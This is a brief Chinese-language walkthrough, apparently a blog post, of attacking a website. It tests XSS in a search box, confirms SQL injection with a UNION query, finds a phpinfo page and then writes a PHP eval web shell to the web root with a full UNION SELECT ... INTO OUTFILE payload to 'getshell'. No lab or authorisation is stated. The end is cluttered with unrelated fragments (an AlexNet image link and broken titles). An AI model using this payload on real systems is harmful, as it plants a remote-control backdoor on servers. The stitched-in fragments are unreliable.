进入首页首先看到一个搜索框,那么我们试一下xss
用script弹了个一
接下来我们尝试一下sql注入
这里我们使用联合查询查到了他的数据库名,那么这里也就存在SQL注入了
这里存在SQL注入那么我们就尝试一下是否可以注入木马来getshell
首先我们扫描目录,找到phpinfo页面
-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/yynzj.php' #
然后去访问
进行连接
成功getshell
![[动手学习深度学习]24. AlexNet](http://pic.xiahunao.cn/nshx/[动手学习深度学习]24. AlexNet)
-观察者模式)
在水文水资源、水环境中的应用)